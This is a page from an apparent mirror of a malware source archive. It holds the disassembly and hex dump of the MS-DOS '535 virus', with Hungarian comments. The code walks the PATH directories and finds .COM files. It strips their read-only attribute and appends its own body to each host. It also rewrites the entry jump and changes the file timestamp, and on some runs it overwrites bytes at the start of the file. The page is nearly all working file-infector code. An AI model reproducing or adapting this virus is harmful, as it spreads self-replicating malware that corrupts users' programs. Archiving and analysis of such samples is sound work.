ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
9432413cf6
MalwareSourceCode/MSDOS/S-Index/Virus.MSDOS.Unknown.s35.asm
vxunderground 4b9382ddbc re-organize 
push
2022-08-21 04:07:57 -05:00

311 lines
10 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

535 virus:
11E3:0100 E90404 JMP 0507
11E3:0103 49 DEC CX
11E3:0104 60 DB 60
11E3:0105 6D DB 6D
11E3:0106 2035 AND [DI],DH
11E3:0108 3335 XOR SI,[DI]
11E3:010A 205649 AND [BP+49],DL
11E3:010D 52 PUSH DX
11E3:010E 55 PUSH BP
11E3:010F 53 PUSH BX
11E3:0110 210D AND [DI],CX
11E3:0112 0A24 OR AH,[SI]
11E3:0114 0000 ADD [BX+SI],AL
11E3:04FA 0000 ADD [BX+SI],AL
11E3:04FC B409 MOV AH,09
11E3:04FE BA0301 MOV DX,0103
11E3:0501 CD21 INT 21
11E3:0503 B400 MOV AH,00
11E3:0505 CD20 INT 20
;Belpsi pont
11E3:0507 51 PUSH CX
11E3:0508 BAEE06 MOV DX,06EE
11E3:050B 90 NOP
11E3:050C 8BF2 MOV SI,DX
11E3:050E BF0001 MOV DI,0100
11E3:0511 B90300 MOV CX,0003
11E3:0514 FC CLD
11E3:0515 F3 REPZ
11E3:0516 A4 MOVSB ;Eredeti 3 byte vissza
11E3:0517 B430 MOV AH,30
11E3:0519 CD21 INT 21 ;DOS. v ltozat lekrdezse
11E3:051B 3C00 CMP AL,00
11E3:051D 7503 JNZ 0522
11E3:051F E9BA01 JMP 06DC
11E3:0522 06 PUSH ES
11E3:0523 B42F MOV AH,2F
11E3:0525 CD21 INT 21 ;DTA. lekrdezse
11E3:0527 8BF2 MOV SI,DX
11E3:0529 899C0300 MOV [SI+0003],BX ;DTA. cim let rol sa
11E3:052D 8C840500 MOV [SI+0005],ES
11E3:0531 07 POP ES
11E3:0532 B41A MOV AH,1A
11E3:0534 BA3000 MOV DX,0030
11E3:0537 90 NOP
11E3:0538 03D6 ADD DX,SI
11E3:053A CD21 INT 21 ;DTA. be llit sa
11E3:053C 06 PUSH ES
11E3:053D 56 PUSH SI
11E3:053E 33FF XOR DI,DI
11E3:0540 8E062C00 MOV ES,[002C] ;K”rnyezet szegmense
11E3:0544 5E POP SI
11E3:0545 56 PUSH SI
11E3:0546 81C61A00 ADD SI,001A
11E3:054A AC LODSB
11E3:054B B90080 MOV CX,8000 ;Max. 32k.byte
11E3:054E F2 REPNZ
11E3:054F AE SCASB
11E3:0550 B90400 MOV CX,0004 ;4 karakteres szo ("PATH")
11E3:0553 AC LODSB ;olvas
11E3:0554 AE SCASB ;hasonlit
11E3:0555 75ED JNZ 0544
11E3:0557 E2FA LOOP 0553
11E3:0559 5E POP SI
11E3:055A 07 POP ES
11E3:055B 89BC1200 MOV [SI+0012],DI
11E3:055F 8BDE MOV BX,SI
11E3:0561 81C61F00 ADD SI,001F
11E3:0565 8BFE MOV DI,SI
11E3:0567 EB3B JMP 05A4
11E3:0569 90 NOP
11E3:056A 83BC120000 CMP WORD PTR [SI+0012],+00 ;Path vge ?
11E3:056F 7503 JNZ 0574
11E3:0571 E95E01 JMP 06D2
11E3:0574 1E PUSH DS
11E3:0575 56 PUSH SI
11E3:0576 26 ES:
11E3:0577 8E1E2C00 MOV DS,[002C] ;K”rnyezet szegmense
11E3:057B 8BFE MOV DI,SI
11E3:057D 26 ES:
11E3:057E 8BB51200 MOV SI,[DI+0012]
11E3:0582 81C71F00 ADD DI,001F
11E3:0586 AC LODSB
11E3:0587 3C3B CMP AL,3B
11E3:0589 740A JZ 0595
11E3:058B 3C00 CMP AL,00
11E3:058D 7403 JZ 0592
11E3:058F AA STOSB
11E3:0590 EBF4 JMP 0586
11E3:0592 BE0000 MOV SI,0000
11E3:0595 5B POP BX
11E3:0596 1F POP DS
11E3:0597 89B71200 MOV [BX+0012],SI
11E3:059B 807DFF5C CMP BYTE PTR [DI-01],5C ;"\" jel ?
11E3:059F 7403 JZ 05A4
11E3:05A1 B05C MOV AL,5C
11E3:05A3 AA STOSB
11E3:05A4 89BF1400 MOV [BX+0014],DI
11E3:05A8 8BF3 MOV SI,BX
11E3:05AA 81C60C00 ADD SI,000C
11E3:05AE B90600 MOV CX,0006
11E3:05B1 F3 REPZ
11E3:05B2 A4 MOVSB
11E3:05B3 8BF3 MOV SI,BX
11E3:05B5 B44E MOV AH,4E
11E3:05B7 BA1F00 MOV DX,001F
11E3:05BA 90 NOP
11E3:05BB 03D6 ADD DX,SI
11E3:05BD B90300 MOV CX,0003
11E3:05C0 CD21 INT 21 ;Els” bejegyzs keresse
11E3:05C2 EB05 JMP 05C9
11E3:05C4 90 NOP
11E3:05C5 B44F MOV AH,4F
11E3:05C7 CD21 INT 21 ;K”vetkez” bejegyzs keresse
11E3:05C9 7302 JNB 05CD
11E3:05CB EB9D JMP 056A
11E3:05CD 8B844600 MOV AX,[SI+0046]
11E3:05D1 241D AND AL,1D
11E3:05D3 3C1D CMP AL,1D
11E3:05D5 74EE JZ 05C5
11E3:05D7 81BC4A0000FA CMP WORD PTR [SI+004A],FA00
11E3:05DD 77E6 JA 05C5
11E3:05DF 83BC4A000A CMP WORD PTR [SI+004A],+0A
11E3:05E4 72DF JB 05C5
11E3:05E6 8BBC1400 MOV DI,[SI+0014]
11E3:05EA 56 PUSH SI
11E3:05EB 81C64E00 ADD SI,004E
11E3:05EF AC LODSB
11E3:05F0 AA STOSB
11E3:05F1 3C00 CMP AL,00
11E3:05F3 75FA JNZ 05EF
11E3:05F5 5E POP SI
11E3:05F6 B80043 MOV AX,4300
11E3:05F9 BA1F00 MOV DX,001F
11E3:05FC 90 NOP
11E3:05FD 03D6 ADD DX,SI
11E3:05FF CD21 INT 21 ;Attrib lekrdezse
11E3:0601 898C0A00 MOV [SI+000A],CX
11E3:0605 B80143 MOV AX,4301
11E3:0608 81E1FEFF AND CX,FFFE
11E3:060C BA1F00 MOV DX,001F
11E3:060F 90 NOP
11E3:0610 03D6 ADD DX,SI
11E3:0612 CD21 INT 21 ;Attrib  t llit sa
11E3:0614 B8023D MOV AX,3D02
11E3:0617 BA1F00 MOV DX,001F
11E3:061A 90 NOP
11E3:061B 03D6 ADD DX,SI
11E3:061D CD21 INT 21 ;File nyit sa
11E3:061F 7303 JNB 0624
11E3:0621 E99F00 JMP 06C3
11E3:0624 8BD8 MOV BX,AX
11E3:0626 B80057 MOV AX,5700
11E3:0629 CD21 INT 21 ;Keletkezsi id” lekrdezse
11E3:062B 898C1800 MOV [SI+0018],CX
11E3:062F 89941600 MOV [SI+0016],DX
11E3:0633 B42C MOV AH,2C
11E3:0635 CD21 INT 21 ;id” lekrdezse
11E3:0637 80E607 AND DH,07
11E3:063A 7510 JNZ 064C
11E3:063C B440 MOV AH,40
11E3:063E B90500 MOV CX,0005
11E3:0641 8BD6 MOV DX,SI
11E3:0643 81C22B00 ADD DX,002B
11E3:0647 CD21 INT 21 ;5 byte ki¡r sa
11E3:0649 EB5F JMP 06AA
11E3:064B 90 NOP
11E3:064C B43F MOV AH,3F
11E3:064E B90300 MOV CX,0003
11E3:0651 8BD6 MOV DX,SI
11E3:0653 CD21 INT 21 ;Els” 3 byte olvas sa
11E3:0655 7253 JB 06AA
11E3:0657 3D0300 CMP AX,0003
11E3:065A 754E JNZ 06AA
11E3:065C B80242 MOV AX,4202
11E3:065F 33C9 XOR CX,CX
11E3:0661 33D2 XOR DX,DX
11E3:0663 CD21 INT 21 ;File mret meghat roz sa
11E3:0665 7243 JB 06AA
11E3:0667 8BC8 MOV CX,AX
11E3:0669 2D0300 SUB AX,0003
11E3:066C 89840800 MOV [SI+0008],AX
11E3:0670 81C1E702 ADD CX,02E7
11E3:0674 8BFE MOV DI,SI
11E3:0676 81EFE501 SUB DI,01E5
11E3:067A 890D MOV [DI],CX
11E3:067C B440 MOV AH,40
11E3:067E B91702 MOV CX,0217
11E3:0681 90 NOP
11E3:0682 8BD6 MOV DX,SI
11E3:0684 81EAE701 SUB DX,01E7
11E3:0688 CD21 INT 21 ;Fert”zs
11E3:068A 721E JB 06AA
11E3:068C 3D1702 CMP AX,0217
11E3:068F 90 NOP
11E3:0690 7518 JNZ 06AA
11E3:0692 B80042 MOV AX,4200
11E3:0695 33C9 XOR CX,CX
11E3:0697 33D2 XOR DX,DX
11E3:0699 CD21 INT 21 ;File elejre  ll
11E3:069B 720D JB 06AA
11E3:069D B440 MOV AH,40
11E3:069F B90300 MOV CX,0003
11E3:06A2 8BD6 MOV DX,SI
11E3:06A4 81C20700 ADD DX,0007
11E3:06A8 CD21 INT 21 ;Uj JMP ki¡r sa
11E3:06AA 8B8C1800 MOV CX,[SI+0018]
11E3:06AE 8B941600 MOV DX,[SI+0016]
11E3:06B2 81E1E0FF AND CX,FFE0
11E3:06B6 81C91D00 OR CX,001D
11E3:06BA B80157 MOV AX,5701
11E3:06BD CD21 INT 21
11E3:06BF B43E MOV AH,3E
11E3:06C1 CD21 INT 21 ;File z r sa
11E3:06C3 B80143 MOV AX,4301
11E3:06C6 8B8C0A00 MOV CX,[SI+000A]
11E3:06CA BA1F00 MOV DX,001F
11E3:06CD 90 NOP
11E3:06CE 03D6 ADD DX,SI
11E3:06D0 CD21 INT 21 ;Eredeti attrib. vissza
11E3:06D2 1E PUSH DS
11E3:06D3 B41A MOV AH,1A
11E3:06D5 C5940300 LDS DX,[SI+0003]
11E3:06D9 CD21 INT 21 ;Eredeti DTA. vissza
11E3:06DB 1F POP DS
11E3:06DC 59 POP CX
11E3:06DD 33C0 XOR AX,AX
11E3:06DF 33DB XOR BX,BX
11E3:06E1 33D2 XOR DX,DX
11E3:06E3 33F6 XOR SI,SI
11E3:06E5 BF0001 MOV DI,0100
11E3:06E8 57 PUSH DI
11E3:06E9 33FF XOR DI,DI
11E3:06EB C2FFFF RET FFFF ;Eredeti prg. futtat sa
11E3:06EE E9F903 JMP 0AEA
11E3:06F1 8000D9 ADD BYTE PTR [BX+SI],D9
11E3:06F4 0DE904 OR AX,04E9
11E3:06F7 0420 ADD AL,20
11E3:06F9 002A ADD [BP+SI],CH
11E3:06FB 2E CS:
11E3:06FC 43 INC BX
11E3:06FD 4F DEC DI
11E3:06FE 4D DEC BP
11E3:06FF 0028 ADD [BX+SI],CH
11E3:0701 007E1B ADD [BP+1B],BH
11E3:0704 56 PUSH SI
11E3:0705 16 PUSH SS
11E3:0706 16 PUSH SS
11E3:0707 3F AAS
11E3:0708 50 PUSH AX
11E3:0709 41 INC CX
11E3:070A 54 PUSH SP
11E3:070B 48 DEC AX
11E3:070C 3D352E CMP AX,2E35
11E3:070F 43 INC BX
11E3:0710 4F DEC DI
11E3:0711 4D DEC BP
11E3:0712 005C44 ADD [SI+44],BL
11E3:0715 49 DEC CX
11E3:0716 53 PUSH BX
11E3:0717 4B DEC BX
11E3:0718 43 INC BX
11E3:0719 4F DEC DI
11E3:071A 50 PUSH AX
11E3:071B 59 POP CX
11E3:071C 2E CS:
11E3:071D 43 INC BX
11E3:071E 0DFF76 OR AX,76FF
-d 0100 071f
11E3:0100 E9 04 04 49 60 6D 20 35-33 35 20 56 49 52 55 53 ...I`m 535 VIRUS
11E3:0110 21 0D 0A 24 00 00 00 00-00 00 00 00 00 00 00 00 !..$............
11E3:04F0 00 00 00 00 00 00 00 00-00 00 00 00 B4 09 BA 03 ................
11E3:0500 01 CD 21 B4 00 CD 20 51-BA EE 06 90 8B F2 BF 00 ..!... Q........
11E3:0510 01 B9 03 00 FC F3 A4 B4-30 CD 21 3C 00 75 03 E9 ........0.!<.u..
11E3:0520 BA 01 06 B4 2F CD 21 8B-F2 89 9C 03 00 8C 84 05 ..../.!.........
11E3:0530 00 07 B4 1A BA 30 00 90-03 D6 CD 21 06 56 33 FF .....0.....!.V3.
11E3:0540 8E 06 2C 00 5E 56 81 C6-1A 00 AC B9 00 80 F2 AE ..,.^V..........
11E3:0550 B9 04 00 AC AE 75 ED E2-FA 5E 07 89 BC 12 00 8B .....u...^......
11E3:0560 DE 81 C6 1F 00 8B FE EB-3B 90 83 BC 12 00 00 75 ........;......u
11E3:0570 03 E9 5E 01 1E 56 26 8E-1E 2C 00 8B FE 26 8B B5 ..^..V&..,...&..
11E3:0580 12 00 81 C7 1F 00 AC 3C-3B 74 0A 3C 00 74 03 AA .......<;t.<.t..
11E3:0590 EB F4 BE 00 00 5B 1F 89-B7 12 00 80 7D FF 5C 74 .....[......}.\t
11E3:05A0 03 B0 5C AA 89 BF 14 00-8B F3 81 C6 0C 00 B9 06 ..\.............
11E3:05B0 00 F3 A4 8B F3 B4 4E BA-1F 00 90 03 D6 B9 03 00 ......N.........
11E3:05C0 CD 21 EB 05 90 B4 4F CD-21 73 02 EB 9D 8B 84 46 .!....O.!s.....F
11E3:05D0 00 24 1D 3C 1D 74 EE 81-BC 4A 00 00 FA 77 E6 83 .$.<.t...J...w..
11E3:05E0 BC 4A 00 0A 72 DF 8B BC-14 00 56 81 C6 4E 00 AC .J..r.....V..N..
11E3:05F0 AA 3C 00 75 FA 5E B8 00-43 BA 1F 00 90 03 D6 CD .<.u.^..C.......
11E3:0600 21 89 8C 0A 00 B8 01 43-81 E1 FE FF BA 1F 00 90 !......C........
11E3:0610 03 D6 CD 21 B8 02 3D BA-1F 00 90 03 D6 CD 21 73 ...!..=.......!s
11E3:0620 03 E9 9F 00 8B D8 B8 00-57 CD 21 89 8C 18 00 89 ........W.!.....
11E3:0630 94 16 00 B4 2C CD 21 80-E6 07 75 10 B4 40 B9 05 ....,.!...u..@..
11E3:0640 00 8B D6 81 C2 2B 00 CD-21 EB 5F 90 B4 3F B9 03 .....+..!._..?..
11E3:0650 00 8B D6 CD 21 72 53 3D-03 00 75 4E B8 02 42 33 ....!rS=..uN..B3
11E3:0660 C9 33 D2 CD 21 72 43 8B-C8 2D 03 00 89 84 08 00 .3..!rC..-......
11E3:0670 81 C1 E7 02 8B FE 81 EF-E5 01 89 0D B4 40 B9 17 .............@..
11E3:0680 02 90 8B D6 81 EA E7 01-CD 21 72 1E 3D 17 02 90 .........!r.=...
11E3:0690 75 18 B8 00 42 33 C9 33-D2 CD 21 72 0D B4 40 B9 u...B3.3..!r..@.
11E3:06A0 03 00 8B D6 81 C2 07 00-CD 21 8B 8C 18 00 8B 94 .........!......
11E3:06B0 16 00 81 E1 E0 FF 81 C9-1D 00 B8 01 57 CD 21 B4 ............W.!.
11E3:06C0 3E CD 21 B8 01 43 8B 8C-0A 00 BA 1F 00 90 03 D6 >.!..C..........
11E3:06D0 CD 21 1E B4 1A C5 94 03-00 CD 21 1F 59 33 C0 33 .!........!.Y3.3
11E3:06E0 DB 33 D2 33 F6 BF 00 01-57 33 FF C2 FF FF E9 F9 .3.3....W3......
11E3:06F0 03 80 00 D9 0D E9 04 04-20 00 2A 2E 43 4F 4D 00 ........ .*.COM.
11E3:0700 28 00 7E 1B 56 16 16 3F-50 41 54 48 3D 35 2E 43 (.~.V..?PATH=5.C
11E3:0710 4F 4D 00 5C 44 49 53 4B-43 4F 50 59 2E 43 0D FF OM.\DISKCOPY.C..

Reference in New Issue View Git Blame Copy Permalink